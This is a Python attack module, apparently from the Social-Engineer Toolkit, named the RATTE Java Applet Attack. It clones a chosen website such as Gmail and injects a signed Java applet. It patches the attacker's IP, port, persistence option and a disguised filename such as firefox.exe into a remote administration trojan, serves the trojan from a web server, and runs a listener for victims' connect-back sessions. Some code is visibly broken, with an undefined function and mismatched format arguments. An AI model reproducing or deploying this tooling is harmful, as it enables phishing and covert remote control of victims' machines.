#!/usr/bin/env python # # These are required fields # import sys import subprocess import os from src.core.menu import text from src.core import setcore as core from time import sleep import urlparse definepath = os.getcwd() setdir = setdir() MAIN=" RATTE Java Applet Attack (Remote Administration Tool Tommy Edition) - Read the readme/RATTE_README.txt first" #This is RATTE (Remote Administration Tool Tommy Edition) attack module. It will launch a java applet attack to inject RATTE. Then it will launch RATTE-Server and wait for victim to connect. RATTE can beat local Firewalls, IDS and even EAL 4+ certified network firewalls. #This release one is only for education!" AUTHOR=" Thomas Werth" httpd=None # # This will start a web server in the directory root you specify, so for example # you clone a website then run it in that web server, it will pull any index.html file # def start_web_server_tw(directory,port): global httpd try: # import the threading, socketserver, and simplehttpserver import thread,SocketServer,SimpleHTTPServer # create the httpd handler for the simplehttpserver # we set the allow_reuse_address incase something hangs can still bind to port class ReusableTCPServer(SocketServer.TCPServer): allow_reuse_address=True # specify the httpd service on (all interfaces) on port 80 httpd = ReusableTCPServer(("", port),SimpleHTTPServer.SimpleHTTPRequestHandler) # thread this mofo thread.start_new_thread(httpd.serve_forever,()) # change directory to the path we specify for output path os.chdir(directory) # handle keyboard interrupts except KeyboardInterrupt: core.print_info("Exiting the SET web server...") httpd.socket.close() # handle the rest #except Exception: # print "[*] Exiting the SET web server...\n" # httpd.socket.close() def stop_web_server_tw(): global httpd try: httpd.socket.close() # handle the exception except Exception: httpd.socket.close() # # This will create the java applet attack from start to finish. # Includes payload (reverse_meterpreter for now) cloning website # and additional capabilities. # def java_applet_attack_tw(website,port,directory,ipaddr): # clone the website and inject java applet core.site_cloner(website,directory,"java") ############################################ # use customized Ratte nehmen ############################################ # this part is needed to rename the msf.exe file to a randomly generated one if os.path.isfile("%s/rand_gen" % (setdir)): # open the file fileopen=file("%s/rand_gen" % (setdir), "r") # start a loop for line in fileopen: # define executable name and rename it filename=line.rstrip() # move the file to the specified directory and filename subprocess.Popen("cp src/payloads/ratte/ratte.binary %s/%s 1> /dev/null 2> /dev/null" % (directory,filename), shell=True).wait() # lastly we need to copy over the signed applet subprocess.Popen("cp %s/Signed_Update.jar %s 1> /dev/null 2> /dev/null" % (setdir,directory), shell=True).wait() #TODO index.html parsen und IPADDR:Port ersetzen fileopen=open("%s/index.html" % (directory), "rb") data=fileopen.read() fileopen.close() filewrite=open("%s/index.html" % (directory), "wb") toReplace=core.grab_ipaddress()+":80" #replace 3 times filewrite.write(data.replace(str(toReplace), ipaddr+":"+str(port), 3) ) filewrite.close() # start the web server by running it in the background start_web_server_tw(directory,port) # # Start ratteserver # def ratte_listener_start(port): # launch ratteserver using ../ cause of reports/ subdir #subprocess.Popen("%s/src/set_payloads/ratte/ratteserver %d" % (os.getcwd(),port), shell=True).wait() subprocess.Popen("../src/payloads/ratte/ratteserver %d" % (port), shell=True).wait() def prepare_ratte(ipaddr,ratteport, persistent,customexe): core.print_status("preparing RATTE...") # replace ipaddress with one that we need for reverse connection back ############ #Load content of RATTE ############ fileopen=open("src/payloads/ratte/ratte.binary" , "rb") data=fileopen.read() fileopen.close() ############ #PATCH Server IP into RATTE ############ filewrite=open("%s/ratteM.exe" % (setdir), "wb") host=int(len(ipaddr)+1) * "X" rPort=int(len(str(ratteport))+1) * "Y" pers=int(len(str(persistent))+1) * "Z" #check ob cexe > 0, sonst wird ein Feld gepatcht (falsch!) if len(str(customexe)) > 0: cexe=int(len(str(customexe))+1) * "Q" else: cexe="" filewrite.write(data.replace(str(cexe), customexe+"\x00", 1).replace(str(pers), persistent+"\x00", 1).replace(str(host), ipaddr+"\x00", 1).replace(str(rPort), str(ratteport)+"\x00", 1) ) filewrite.close() # def main(): header is required def main(): valid_site = False valid_ip = False valid_persistence = False input_counter= 0 site_input_counter=0 #pause=raw_input("This module has finished completing. Press <enter> to continue") # Get a *VALID* website address while valid_site != True and site_input_counter < 3: website = raw_input(core.setprompt(["9", "2"], "Enter website to clone (ex. https://gmail.com)")) site = urlparse.urlparse(website) if site.scheme == "http" or site.scheme == "https": if site.netloc != "": valid_site = True else: if site_input_counter == 2: core.print_error("\nMaybe you have the address written down wrong?" + core.bcolors.ENDC) sleep(4) return else: core.print_warning("I can't determine the fqdn or IP of the site. Try again?") site_input_counter += 1 else: if site_input_counter == 2: core.print_error("\nMaybe you have the address written down wrong?") sleep(4) return else: core.print_warning("I couldn't determine whether this is an http or https site. Try again?") site_input_counter +=1 #core.DebugInfo("site.scheme is: %s " % site.scheme) #core.DebugInfo("site.netloc is: %s " % site.netloc) #core.DebugInfo("site.path is: %s " % site.path) #core.DebugInfo("site.params are: %s " % site.params) #core.DebugInfo("site.query is: %s " % site.query) #core.DebugInfo("site.fragment is: %s " % site.fragment) while valid_ip != True and input_counter < 3: ipaddr = raw_input(core.setprompt(["9", "2"], "Enter the IP address to connect back on")) valid_ip = core.validate_ip(ipaddr) if not valid_ip: if input_counter == 2: core.print_error("\nMaybe you have the address written down wrong?") sleep(4) return else: input_counter += 1 #javaport must be 80, cause applet uses in web injection port 80 to download payload! try: javaport = int(raw_input(core.setprompt(["9", "2"], "Port Java applet should listen on [80]"))) while javaport == 0 or javaport > 65535: if javaport == 0: core.print_warning(text.PORT_NOT_ZERO) if javaport > 65535: core.print_warning(text.PORT_TOO_HIGH) javaport = int(raw_input(core.setprompt(["9", "2"],"Port Java applet should listen on [80]"))) except ValueError: #core.print_info("Port set to default of 80") javaport = 80 #javaport=80 try: ratteport = int(raw_input(core.setprompt(["9", "2"], "Port RATTE Server should listen on [8080]"))) while ratteport == javaport or ratteport == 0 or ratteport > 65535: if ratteport == javaport: core.print_warning("Port must not be equal to javaport!") if ratteport == 0: core.print_warning(text.PORT_NOT_ZERO) if ratteport > 65535: core.print_warning(text.PORT_TOO_HIGH) ratteport = int(raw_input(core.setprompt(["9", "2"], "Port RATTE Server should listen on [8080]"))) except ValueError: ratteport = 8080 persistent = core.yesno_prompt(["9","2"], "Should RATTE be persistentententent [no|yes]?") # j0fer 06-27-2012 # while valid_persistence != True: # j0fer 06-27-2012 # persistent=raw_input(core.setprompt(["9", "2"], "Should RATTE be persistent [no|yes]?")) # j0fer 06-27-2012 # persistent=str.lower(persistent) # j0fer 06-27-2012 # if persistent == "no" or persistent == "n": # j0fer 06-27-2012 # persistent="NO" # j0fer 06-27-2012 # valid_persistence = True # j0fer 06-27-2012 # elif persistent == "yes" or persistent == "y": # j0fer 06-27-2012 # persistent="YES" # j0fer 06-27-2012 # valid_persistence = True # j0fer 06-27-2012 # else: # j0fer 06-27-2012 # core.print_warning(text.YES_NO_RESPONSES) customexe=raw_input(core.setprompt(["9", "2"], "Use specifix filename (ex. firefox.exe) [filename.exe or empty]?")) ####################################### # prepare RATTE ####################################### prepare_ratte(ipaddr,ratteport,persistent,customexe) ###################################### # Java Applet Attack to deploy RATTE ####################################### core.print_info("Starting java applet attack...") java_applet_attack_tw(website,javaport, "reports/",ipaddr) fileopen=file("%s/rand_gen" % (setdir,definepath), "r") for line in fileopen: ratte_random = line.rstrip() subprocess.Popen("cp %s/ratteM.exe %s/reports/%s" % (setdir,definepath,definepath,ratte_random), shell=True).wait() ####################### # start ratteserver ####################### core.print_info("Starting ratteserver...") ratte_listener_start(ratteport) ###################### # stop webserver ###################### stop_web_server_tw() return